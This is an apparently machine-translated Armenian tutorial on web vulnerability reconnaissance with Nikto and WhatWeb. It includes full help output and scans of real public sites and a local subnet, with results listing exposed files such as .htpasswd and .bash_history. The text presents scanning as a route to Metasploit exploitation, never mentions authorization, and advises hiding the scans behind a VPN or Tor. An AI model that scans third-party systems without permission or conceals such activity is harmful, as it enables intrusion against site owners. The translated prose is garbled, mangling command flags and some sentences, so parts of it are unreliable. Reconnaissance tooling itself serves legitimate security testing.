Եթե դուք հաջողակ եք, կգտնվի անվայել շահագործմամբ խոցելիություն, ինչը նշանակում է, որ արդեն կա գործիք, որը կօգնի օգտագործել այս թույլ տեղը: Համապատասխան գործիքի օգնությամբ, որը ինքնաբերաբար գործում է խոցելիությունը, մի հաքերը կարող է մուտք ունենալ թիրախ `ցանկացած թվով թաքնված գրոհներ կատարելու համար, օրինակ, օրինակ, վնասակար կոդ ավելացնելը.
Քայլ 1. Nikto տեղադրում
Եթե դուք օգտագործում եք Kali Linux- ը, ապա Nikto- ն նախապես կհամարվի, այնպես որ ստիպված չեք լինի որեւէ բան ներբեռնել եւ որեւէ բան տեղադրել: Այն տեղակայված կլինի «Խոցելիության վերլուծություն» անվանակարգում: Եթե ինչ-ինչ պատճառներով դա չունեք, կարող եք ներբեռնել Nikto- ն իր պահեստից մինչեւ Գյուտ կամ պարզապես օգտագործեք հրամանը apt install.
apt install nikto
Եթե աշխատում եք Mac- ի վրա, կարող եք օգտագործել Homebrew, Տեղադրելու համար Nikto.
brew install nikto
Քայլ 2. Հանդիպեք Nikto- ին
Նախքան Nikto- ն օգտագործելը վեբ սերվերները սկանավորելուց, օգտագործեք պարամետրը -Օգնական, տեսնել այն ամենը, ինչ կարող եք անել այս գործիքի հետ:
nikto -Help
Options:
-ask+ Whether to ask about submitting updates
yes Ask about each (default)
no Don't ask, don't send
auto Don't ask, just send
-Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
-config+ Use this config file
-Display+ Turn on/off display outputs:
1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors
P Print progress to STDOUT
S Scrub output of IPs and hostnames
V Verbose output
-dbcheck Check database and other key files for syntax errors
-evasion+ Encoding technique:
1 Random URI encoding (non-UTF8)
2 Directory self-reference (/./)
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-Format+ Save file (-o) format:
csv Comma-separated-value
htm HTML Format
nbe Nessus NBE format
sql Generic SQL (see docs for schema)
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help Extended help information
-host+ Target host
-404code Ignore these HTTP codes as negative responses (always). Format is "302,301".
-404string Ignore this string in response body content as negative response (always). Can be a regular expression.
-id+ Host authentication to use, format is id:pass or id:pass:realm
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s)
-mutate+ Guess additional file names:
1 Test all files with all root directories
2 Guess for password file names
3 Enumerate user names via Apache (/~user type requests)
4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 Attempt to guess directory names from the supplied dictionary file
-mutate-options Provide information for mutates
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-no404 Disables nikto attempting to guess a 404 page
-Option Over-ride an option in nikto.conf, can be issued multiple times
-output+ Write output to this file ('.' for auto-name)
-Pause+ Pause between tests (seconds, integer or float)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Save Save positive responses to this directory ('.' for auto-name)
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
d WebService
e Administrative Console
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-useragent Over-rides the default useragent
-until Run until the specified time or duration
-update Update databases and plugins from CIRT.net
-useproxy Use the proxy defined in nikto.conf, or argument http://server:port
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value
Քայլ 3. Օգտագործեք հիմնական շարահյուսությունը
Ինչպես տեսնում եք նախորդ քայլից, NIKTO- ն ունի բազմաթիվ ընտրանքներ, բայց մեր նպատակների համար մենք կօգտագործենք հիմնական շարահյուսությունը Իրական IP հասցեով կամ հյուրընկալող առանց անկյունային փակագծերի.
nikto -h <IP or hostname>
Այնուամենայնիվ, NIKTO- ն ունակ է սկանավորել SSL եւ Port 443, որն օգտագործում է HTTPS կայքերը (HTTP- ն դեֆոլտ է օգտագործում 80 պորտ): Այսպիսով, մենք չենք սահմանափակվում միայն հին կայքերի սկանավորմամբ, մենք կարող ենք գնահատել SSL- ի օգտագործմամբ կայքերի խոցելիությունը, որն այսօր գրեթե պարտադիր պահանջ է որոնման արդյունքներում ինդեքսավորման համար.
Եթե մենք գիտենք, որ թիրախային կայքը SSL է, մենք կարող ենք դա նշել NIKTO- ում `որոշ ժամանակ սկանավորելու միջոցով` ավելացնելով -Սուլ Թիմի վերջում.
nikto -h <IP or hostname> -ssl
Քայլ 4. SSL- ի հետ սկանավորեք կայքերը
Օրինակ, սկսենք կայքը սկանավորել pbs.org, Տեսնել այն տեղեկատվության տեսակները, որոնք կարող են տրվել NIKTO- ին: 443 նավահանգիստում մի քանի օգտակար տեղեկատվություն ենք տեսնում գաղտնագրման եւ այլ մանրամասների մասին, ինչպիսիք են, օրինակ, այն փաստը, որ սերվերը աշխատում է NGINX- ի վրա, բայց մեզ համար սերվերն աշխատում է, բայց մեզ համար շատ հետաքրքիր բաներ են աշխատում.
nikto -h pbs.org -ssl
- Nikto v2.1.6
------------------------------------------------------------------------------
- STATUS: Starting up!
+ Target IP: 54.225.198.196
+ Target Hostname: pbs.org
+ Traget Port: 443
------------------------------------------------------------------------------
+ SSl Info: Subject: /CN=www.pbs.org
Altnames: account.pbs.org, admin.pgs.org, dipsy-tc.pbs.org, docs.pbs.org, ga.video.cdn.pbs.org, git.pbs.org, heart.ops.pbs.org, hub-dev.pbs.org, image.pbs.org,
jaws..pbs.org, kids.pbs.org, koth-qa.svp.pbs.org, login.pbs.org, ops.pbs.org, pbs.org, player.pbs.org, projects.pbs.org, sentry.pbs.org, teacherline.pbs.org,
urs.pbs.org, video.pbs.org, weta-qa.svp.pbs.org, whut-qa.svp.pbs.org, wnet.video-qa.pbs.org, wnet.video-staging.pbs.org, www-cache.pbs.org, www.pbs.org
Ciphers: ECDHE-RSA-AES128-GCM-SHA256
Issuer: /C-US/0=Let's Encrypt/CN=Let's Encrypt Authority X3
+ Start Time: 2018-12-05 23:34:06 (GMT-8)
------------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-pbs-fwsrvname' found, with contents: fwcacheproxy1
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://www.pbs.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ RC-1918 IP address found in the 'x-pbs-appsvrip' header: The IP is "10.137.181.52".
+ Uncommon header 'x-cache-fs-status' found, with contents: EXPIRED
+ Uncommon header 'x-pbs-appsvrname' found, with contents: fwcacheproxy1
+ Uncommon header 'x-pbs-appsvrip' found, with contents: 10.137.181.52
+ Server leaks inodes via ETags, header found with file /pbs.org.zip, fields: 0x5b96537e 0x1678
+ 7446 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-12-06 00:30:29 (GMT-8) (3383 seconds)
------------------------------------------------------------------------------
+ 1 host(s) tested
Քայլ 5: IP հասցեների սկանավորում
Այժմ, երբ մենք իրականացրել ենք կայքի արագ սկան, մենք կարող ենք տեղական ցանցում օգտագործել Nikto- ն, ներկառուցված սերվեր գտնելու համար, ինչպիսիք են `երթուղիչի մուտքի կամ HTTP ծառայության էջը, որը պարզապես սերվեր է, առանց կայքի: IP հասցեն պարզելու համար մենք կօգտագործենք ifconfig.
IP հասցեն, որը մենք պետք է պատկանում ենք inet- ին: Դրա վրա մենք կարող ենք օգտագործել ipcalc Ցանցի միջակայքը ստանալու համար: Եթե չունեք IPCalc, կարող եք տեղադրել այն, օգտագործելով հրամանը apt install ipcalc, Եւ հետո կրկնել փորձը: Տեսականին կլինի ցանցից հետո, իմ դեպքում դա 192.168.0.0/24.
ifconfig
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 192.168.0.48 netmask 0xffffff00 broadcast 192.168.0.255
inet6 XXXX::XXX:XXXX:XXXX:XXXX%en0 prefixlen 64 secured scopeid 0x8
ether XX:XX:XX:XX:XX:XX txqueuelen 1000 (Ethernet)
inet6 XXXX::XXX:XXXX:XXXX:XXXX%en0 prefixlen 64 autoconf secured
inet6 XXXX::XXX:XXXX:XXXX:XXXX%en0 prefixlen 64 autoconf temporary
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
en2: flags=8863<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
options=60<TS04,TS06>
ether XX:XX:XX:XX:XX:XX
media: autoselect <full-duplex>
status: inactive
Հիմա մենք ուզում ենք գործարկել Նմապ, Այս ցանցում աշխատող ծառայություններ գտնելու համար: Եկեք սկանավորենք 80 նավահանգիստ, օգտագործելով մեր տեսականին, դրա համար մենք ավելացնում ենք -Og (Grepable ելք), Ստանալ միայն այն տանտերերը, որոնք բարձրացվում եւ աշխատում են, այսինքն, այդ պատասխանը, ասելով, որ 80 նավահանգիստը բաց է: Այնուհետեւ մենք կփրկենք այս ամենը այն ֆայլում, որը կզանգահարեմ nullbyte.txt, Դուք, իր հերթին, կարող եք այն անվանել այնպես, ինչպես ցանկանում եք.
ipcalc 192.168.0.48
Address: 192.168.0.48 11000000.10101000.00000000. 00110000 Netmask: 255.255.255.0 = 24 11111111.11111111.11111111. 00000000 Wildcard: 0.0.0.255 00000000.00000000.00000000. 11111111 => Network: 192.168.0.0/24 11000000.10101000.00000000. 00000000 HostMin: 192.168.0.1 11000000.10101000.00000000. 00000001 HostMax: 192.168.0.254 11000000.10101000.00000000. 11111110 Broadcast: 192.168.0.255 11000000.10101000.00000000. 11111111 Hosts/Net: 254 Class C, Private Internet
Կա մի փոքր ուշադրություն, որը կօգնի բոլոր հյուրերին ուղղակիորեն ուղարկել NIKTO սկանավորման համար: Մենք օգտագործում ենք cat Մեր փաստաթղթում պահվող մուտքային տվյալները կարդալու համար nullbyte.txt (Կամ երբ դուք ինքներդ եք անվանել): Դրանից հետո մենք օգտագործում ենք Անշարժ – Հատուկ գործիք Linux- ում, որը կօգնի գտնել հաջորդ ձեւանմուշը, որտեղ նշանակում է, որ հյուրընկալողը բարձրացվում է եւ Տպարան $2 Սա նշանակում է, որ յուրաքանչյուր տողում պետք է երկրորդ բառը բխել, այսինքն, միայն IP հասցեն: Այնուհետեւ մենք տվյալները կուղարկենք տվյալներին, որոնք կոչվում են targetIP.txt (կամ ինչպես ուզում ես).
cat nullbyte.txt | awk '/Up$/{print $2}' | cat >> targetIP.txt
Այժմ մենք կարող ենք դիտել մեր նոր ֆայլի բովանդակությունը `օգտագործելով կատուն` տեսնելու բոլոր IP հասցեները, որոնք ունեն 80 պորտ.
cat targetIP.txt
192.168.0.1 192.168.0.2 192.168.0.4 192.168.0.5 192.168.0.11 192.168.0.24 192.168.0.31 192.168.0.48 192.168.0.60
Այս ձեւաչափը իդեալական է Nikto- ի համար, քանի որ այն կարող է հեշտությամբ մեկնաբանել նման ֆայլերը: Այսպիսով, մենք կարող ենք այս եզրակացությունը ուղարկել NIKTO- ին հաջորդ թիմի հետ.
nikto -h targetIP.txt
Արդյունքները նման կլինեն այն, ինչ ստացանք SSL- ի հետ սկանավորման ժամանակ.
Քայլ 6. Սկսեք HTTP կայքը
Մենք սկանեցինք պաշտպանված կայք եւ IP հասցեն տեղական ցանցում, այժմ ժամանակն է փնտրել անպաշտպան վեբ տիրույթ, որն օգտագործում է 80 նավահանգիստ: Այս օրինակի համար ես օգտագործում եմ կայքը Afl.com.au, ովքեր այս սկանն անցկացնելու պահին SSL չունեին.
nikto -h www.afl.com.au
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 159.180.84.10 + Target Hostname: www.afl.com.au + Target Port: 80 + Start Time: 2018-12-05 21:48:32 (GMT-8) --------------------------------------------------------------------------- + Server: instart/nginx + Retried via header: 1.1 varnish (Varnish/6.1), 1.1 e9ba0a9a729ff2960a04323bf1833df8.cloudfront.net (CloudFront) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'x-cache' found, with contents: Miss from cloudfront + Uncommon header 'x-instart-cache-id' found, with contents: 17:12768802731504004780::1544075250 + Uncommon header 'v-cache-hit' found, with contents: Hit + Uncommon header 'x-amz-cf-id' found, with contents: Dr-r6OwO5kk9ABt4ejzpc7R7AIF6SuH6kfJHQgP0v6xZoHwMLE55rQ== + Uncommon header 'x-instart-request-id' found, with contents: 12814413144077601501:BEQ01-CPVNPPRY18:1552504721:0 + Uncommon header 'x-oneagent-js-injection' found, with contents: true + Uncommon header 'grace' found, with contents: cache + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-ruxit-js-agent' found, with contents: true + Cookie dtCookie created without the httponly flag + Server banner has changed from 'instart/nginx' to 'nginx' which may suggest a WAF, load balancer or proxy is in place + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/sites/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '*.mobileapp' in robots.txt returned a non-forbidden or redirect HTTP code (400) + Entry '*.liveradio' in robots.txt returned a non-forbidden or redirect HTTP code (400) + Entry '*.smartmobile' in robots.txt returned a non-forbidden or redirect HTTP code (400) + Entry '*.responsive' in robots.txt returned a non-forbidden or redirect HTTP code (400) + Entry '/stats?*/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 8 entries which should be manually viewed. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content. + OSVDB-3092: /psql_history: This might be interesting... + OSVDB-3092: /global/: This might be interesting... + OSVDB-3092: /home/: This might be interesting... + OSVDB-3092: /news: This might be interesting... + OSVDB-3092: /search.vts: This might be interesting... + OSVDB-3092: /stats.htm: This might be interesting... + OSVDB-3092: /stats.txt: This might be interesting... + OSVDB-3092: /stats/: This might be interesting... + OSVDB-3092: /Stats/: This might be interesting... + OSVDB-3093: /.wwwacl: Contains authorization information + OSVDB-3093: /.www_acl: Contains authorization information + OSVDB-3093: /.htpasswd: Contains authorization information + OSVDB-3093: /.access: Contains authorization information + OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web. + OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to. + OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web. + OSVDB-3093: /.htaccess: Contains configuration and/or authorization information + OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites. + OSVDB-3093: /.mysql_history: Database SQL? + OSVDB-3093: /.passwd: Contains authorization information + OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more. + OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol + OSVDB-3093: /.proclog: User home dir with a Procmail rc file. May reveal mail traffic, directories and more. + OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.sh_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-5709: /.nsconfig: Contains authorization information + /portal/changelog: Vignette richtext HTML editor changelog found. + 7587 requests: 4 error(s) and 55 item(s) reported on remote host + End Time: 2018-12-05 22:42:41 (GMT-8) (3249 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Վերը նշված տեղեկատվությունից մենք հասկանում ենք, որ կա լաքեր սերվեր եւ որոշ վերնագրեր, որոնք կարող են ենթադրել, թե ինչպես է կազմաձեւված կայքը կազմաձեւված: Այնուամենայնիվ, ավելի օգտակար տեղեկություններ են հայտնաբերվել կատալոգներ, որոնք կարող են օգնել կապել կազմաձեւման ֆայլերը, որոնք պարունակում են հաշվապահական հաշվառման տվյալներ կամ այլ բաներ, որոնք սխալ են կազմաձեւվել եւ մատչելի են եղել ոչ միաբանություն.
OSVDB տարրերը խոցելիություն են, որոնք հաղորդվում են Բաց կոդով խոցելի տվյալների շտեմարան (2016-ին փակված կայքը: Կարծես այլ խոցելի տվյալների բազաներ, ինչպիսիք են Անվտանգության ֆոկուս, Microsoft Technet եւ խոցեր եւ բացահայտումներ (https://cve.mitre.org/): Անձամբ ավելի մոտ է ինձ National Vulnerabs տվյալների շտեմարան.
Չնայած այն հանգամանքին, որ մեր սկանավորումը չի բացահայտել որեւէ ծանր խոցելիություն, որը կարող է գործել, կարող եք օգտագործել հղման գործիք Քու OSVDB- ի նույնացուցիչը CVE գրառումը փոխանցելու համար, որպեսզի կարողանաք օգտագործել վերը նշված կայքերից մեկը.
Ենթադրենք, որ դուք գտել եք հետազոտության արժանի մի բան, օրինակ Քու-2018-10933, Libssh խոցելիությունը, որի մասին ավելի շատ ենք վերաբերվում Նրանք ավելի վաղ խոսեցին. CVE- ն պարունակում է տեղեկատվություն այն մասին, թե ինչպես այն գործել, թե որքան լուրջ խոցելիություն (օրինակ, կրիտիկական խոցելիություն) եւ մի շարք այլ տեղեկություններ, որոնք կարող են օգնել հարձակման վեկտորը որոշելու համար: Եթե սա արժեքավոր բան է, կարող եք նայել Մետասփլոիտ, Քանի որ ինչ-որ մեկը, ամենայն հավանականությամբ, արդեն մշակել է մոդուլ, որը հեշտությամբ կօգնի գործել այս խոցելիությունը.
Քայլ 7. Սկսեք մետասփլոիտով
Նիկտոյի լավագույն բաներից մեկն այն է, որ դուք պարզապես կարող եք արտահանել ստացված տեղեկատվությունը սկանավորելու ընթացքում այն ձեւաչափով, որը կարող է կարդալ մետազմը: Դա անելու համար պարզապես օգտագործեք վերը նշված սկանավորման հրամանները, բայց վերջում դրանցից դրոշներ ավելացրեք -Ձեւաչափ MSF+. Այս ձեւաչափը կարող է արագորեն համեմատել շահագործման ստացված տվյալները.
nikto -h <IP or hostname> -Format msf+
Այսպիսով, այսօրվա ղեկավարությամբ մենք տեղափոխվեցինք նպատակը դրա մեջ խոցելիությունը գտնելու համար, եւ այնուհետեւ կապեց շահագործման հետ կապված խոցելիությունը, որպեսզի մենք ստիպված լինենք ձեռքով կատարել բոլոր աշխատանքները: Քանի որ Nikto- ն գաղտնի չի աշխատում, խելամիտ է այս սկաները կատարել VPN- ի, Tor- ի կամ մեկ այլ տեսակի ծառայության միջոցով, որպեսզի ձեր IP հասցեն չլինի որպես կասկածելի.
Ինչպես որոշել Whatweb- ի օգտագործման կայքերի տեխնոլոգիաները
Whatweb- ը նույնացնում է կայքերը.
Նրա նպատակն է պատասխանել հարցին. «Ինչ է այս կայքը?».
Whatweb- ը ճանաչում է վեբ տեխնոլոգիաները, ներառյալ բովանդակության կառավարման համակարգերը (CMS), բլոգավարման պլատֆորմներ, վիճակագրություն / վերլուծաբաններ, JavaScript գրադարաններ, վեբ սերվերներ եւ ներկառուցված սարքեր.
Whatweb- ը ունի ավելի քան 1700 plugin, որոնցից յուրաքանչյուրը ինչ-որ բան է ճանաչում.
Whatweb- ը որոշում է նաեւ տարբերակների, էլփոստի հասցեների, հաշվապահական հաշվառման նույնականացուցիչների, վեբ ենթակառուցվածքների մոդուլների, SQL սխալների քանակը եւ այլն:
Whatweb- ը կարող է լինել գաղտնի եւ արագ կամ զգույշ, բայց դանդաղ.
Whatweb- ը աջակցում է աշխատանքի մակարդակին `արագության եւ հուսալիության փոխզիջում վերահսկելու համար.
Երբ այցելում եք կայք ձեր զննարկիչում, գործարքը ներառում է բազմաթիվ խորհուրդներ, որոնց վերաբերյալ վեբ տեխնոլոգիաներն օգտագործում են այս վեբ կայքը.
Երբեմն ինտերնետային էջի մեկ այցը պարունակում է բավարար տեղեկատվություն կայքը հայտնաբերելու համար, բայց երբ դա տեղի չի ունենում, Whatweb- ը կարող է հարցաքննել կայքը կախվածությամբ.
Լռելյայն աշխատանքի մակարդակը, որը կոչվում է «գաղտագողի», ամենաարագն է եւ պահանջում է կայքի միայն մեկ HTTP կայք.
Սա հարմար է հանրային կայքերի սկանավորման համար.
Ավելի ագրեսիվ ռեժիմներ մշակվել են ներթափանցման թեստերում օգտագործման համար.
Whatweb հավելվածների մեծ մասը սպառիչ է եւ ճանաչում է մի շարք կրկնօրինակներ բարակից `ակնհայտ.
Օրինակ, WordPrespress- ի կայքերի մեծ մասը կարող է նույնականացվել, օրինակ, Meta HTML պիտակի միջոցով, բայց WordPress- ի կայքը հեռացնում է այս նույնականացման պիտակը, բայց դա չի խանգարում Whatweb- ին.
WordPreshpresh Whatweb Plugin- ը ունի ավելի քան 15 թեստ, որոնք ներառում են Favicon- ի ստուգում, լռելյայն տեղադրման ֆայլեր, մուտքի էջեր եւ ստուգում «/ WP-բովանդակություն».
Առանձնահատկություններ:
- Ավելի քան 1700 plugin
- Վերահսկել փոխզիջումը արագության / անտեսանելիության եւ հուսալիության միջեւ
- Plugins- ը ներառում են URL հասցեների օրինակներ
- Կատարման կարգավորում: Վերահսկեք, թե քանի կայքեր են միաժամանակ սկան.
- Մի քանի ամսագրի ձեւաչափեր. Հակիրճ (GREPPABLE), բանավոր (օգտագործված), XML, JSON, MagicTree, RubyObject, MongoM, SQL եւ Elasticsearch.
- Աջակցություն վստահված անձին, ներառյալ TOR- ին
- Օգտագործողի վերնագրերը http
- Հիմնական վավերացման ստուգում http
- Վեբ էջի վերահղման գրասենյակ
- IP նվագախմբերը NMAP ոճով
- Fuzzy զուգադիպություն
- Արդյունքների հուսալիության բարձրացում
- Օգտագործողի plugins սահմանված հրամանի տողում
Whatweb- ի օգնություն
root@kali:~# whatweb -h
.$$ $. .$$ $.
$$ $. .$$ $$ .$$$. .$$$$$. $$ $. .$$$$. .$$$.
$ $ $$ $ $ $$ $ $$$. $$$ $$$ $ $ $$ $ $ $ $ $$$.
$ `$ $$ $ `$ $$ $ `$ $$ $' $ `$ `$ $ `$ $$ $ `$ $ `$ $#39;
$. $ $$ $. $$$ $. $$$ `$ $. $ :' $. $ $$ $. $$ $. $$$.
$::$ . $$ $::$ $$ $::$ $$ $::$ $::$ . $$ $::$ $::$ $$
$;;$ $$ $$ $;;$ $$ $;;$ $$ $;;$ $;;$ $$ $$ $;;$ $;;$ $$
$$$ $$$ $$ $$ $$ $$ $$ $$$ $$$ $$$$$ $$$$#39;
WhatWeb - Next generation web scanner version 0.4.9.
Developed by Andrew Horton aka urbanadventurer and Brendan Coles.
Homepage: http://www.morningstarsecurity.com/research/whatweb
Usage: whatweb [options]
TARGET SELECTION:
Enter URLs, hostnames, IP adddresses,
filenames, or nmap-format IP address ranges.
--input-file=FILE, -i Read targets from a file. You can pipe
hostnames or URLs directly with -i /dev/stdin.
TARGET MODIFICATION:
--url-prefix Add a prefix to target URLs.
--url-suffix Add a suffix to target URLs.
--url-pattern Insert the targets into a URL.
e.g. example.com/%insert%/robots.txt
AGGRESSION:
The aggression level controls the trade-off between speed/stealth and
reliability.
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
4. Heavy Makes a lot of HTTP requests per target. URLs
from all plugins are attempted.
HTTP OPTIONS:
--user-agent, -U=AGENT Identify as AGENT instead of WhatWeb/0.4.9.
--header, -H Add an HTTP header. eg "Foo:Bar". Specifying a
default header will replace it. Specifying an
empty value, e.g. "User-Agent:" will remove it.
--follow-redirect=WHEN Control when to follow redirects. WHEN may be
`never', `http-only', `meta-only', `same-site',
`same-domain' or `always'. Default: always.
--max-redirects=NUM Maximum number of redirects. Default: 10.
AUTHENTICATION:
--user, -u= HTTP basic authentication.
--cookie, -c=COOKIES Use cookies, e.g. 'name=value; name2=value2'.
PROXY:
--proxy <hostname[:port]> Set proxy hostname and port.
Default: 8080.
--proxy-user Set proxy user and password.
PLUGINS:
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with keywords in a comma
delimited list.
--search-plugins=STRING Search plugins for a keyword.
--plugins, -p=LIST Select plugins. LIST is a comma delimited set
of selected plugins. Default is all.
Each element can be a directory, file or plugin
name and can optionally have a modifier, +/-.
Examples: +/tmp/moo.rb,+/tmp/foo.rb
title,md5,+./plugins-disabled/
./plugins-disabled,-md5
-p + is a shortcut for -p +plugins-disabled.
--grep, -g=STRING Search for STRING in HTTP responses. Reports
with a plugin named Grep.
--custom-plugin=DEFINITION Define a custom plugin named Custom-Plugin,
Examples: ":text=>'powered by abc'"
":version=>/powered[ ]?by ab[0-9]/"
":ghdb=>'intitle:abc "powered by abc"'"
":md5=>'8666257030b94d3bdb46e05945f60b42'"
"{:text=>'powered by abc'}"
--dorks=PLUGIN List Google dorks for the selected plugin.
OUTPUT:
--verbose, -v Verbose output includes plugin descriptions.
Use twice for debugging.
--colour,--color=WHEN control whether colour is used. WHEN may be
`never', `always', or `auto'.
--quiet, -q Do not display brief logging to STDOUT.
--no-errors Suppress error messages.
LOGGING:
--log-brief=FILE Log brief, one-line output.
--log-verbose=FILE Log verbose output.
--log-errors=FILE Log errors.
--log-xml=FILE Log XML format.
--log-json=FILE Log JSON format.
--log-sql=FILE Log SQL INSERT statements.
--log-sql-create=FILE Create SQL database tables.
--log-json-verbose=FILE Log JSON Verbose format.
--log-magictree=FILE Log MagicTree XML format.
--log-object=FILE Log Ruby object inspection format.
--log-mongo-database Name of the MongoDB database.
--log-mongo-collection Name of the MongoDB collection.
Default: whatweb.
--log-mongo-host MongoDB hostname or IP address.
Default: 0.0.0.0.
--log-mongo-username MongoDB username. Default: nil.
--log-mongo-password MongoDB password. Default: nil.
--log-elastic-index Name of the index to store results. Default: whatweb
--log-elastic-host Host:port of the elastic http interface. Default: 127.0.0.1:9200
PERFORMANCE & STABILITY:
--max-threads, -t Number of simultaneous threads. Default: 25.
--open-timeout Time in seconds. Default: 15.
--read-timeout Time in seconds. Default: 30.
--wait=SECONDS Wait SECONDS between connections.
This is useful when using a single thread.
HELP & MISCELLANEOUS:
--short-help Short usage help.
--help, -h Complete usage help.
--debug Raise errors in plugins.
--version Display version information.
EXAMPLE USAGE:
* Scan example.com.
./whatweb example.com
* Scan reddit.com slashdot.org with verbose plugin descriptions.
./whatweb -v reddit.com slashdot.org
* An aggressive scan of wired.com detects the exact version of WordPress.
./whatweb -a 3 www.wired.com
* Scan the local network quickly and suppress errors.
whatweb --no-errors 192.168.0.0/24
* Scan the local network for https websites.
whatweb --no-errors --url-prefix https:// 192.168.0.0/24
* Scan for crossdomain policies in the Alexa Top 1000.
./whatweb -i plugin-development/alexa-top-100.txt
--url-suffix /crossdomain.xml -p crossdomain_xml
OPTIONAL DEPENDENCIES
--------------------------------------------------------------------------------
To enable MongoDB logging install the mongo gem.
root@kali:~#
Whatweb- ի օգտագործման օրինակ
root@kali:~# whatweb -v -a 3 192.168.0.102 WhatWeb report for http://192.168.0.102 Status : 200 OK Title : Toolz TestBed IP : 192.168.0.102 Country : RESERVED, ZZ Summary : JQuery, Script, X-UA-Compatible[IE=edge], HTML5, Apache[2.2,2.2.22], HTTPServer[Ubuntu Linux][Apache/2.2.22 (Ubuntu)] Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.2.22 (from HTTP Server Header) Version : 2.2 Version : 2.2 Google Dorks: (3) Website : http://httpd.apache.org/ [ HTML5 ] HTML version 5, detected by the doctype declaration [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Ubuntu Linux String : Apache/2.2.22 (Ubuntu) (from server string) [ JQuery ] A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/ [ Script ] This plugin detects instances of script HTML elements and returns the script language/type. [ X-UA-Compatible ] This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag. - More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx String : IE=edge HTTP Headers: HTTP/1.1 200 OK Date: Mon, 26 Mar 2018 07:58:48 GMT Server: Apache/2.2.22 (Ubuntu) Last-Modified: Fri, 02 Feb 2018 15:27:56 GMT ETag: "11f-2e38-5643c5b56a8d3" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3541 Connection: close Content-Type: text/html root@kali:~#
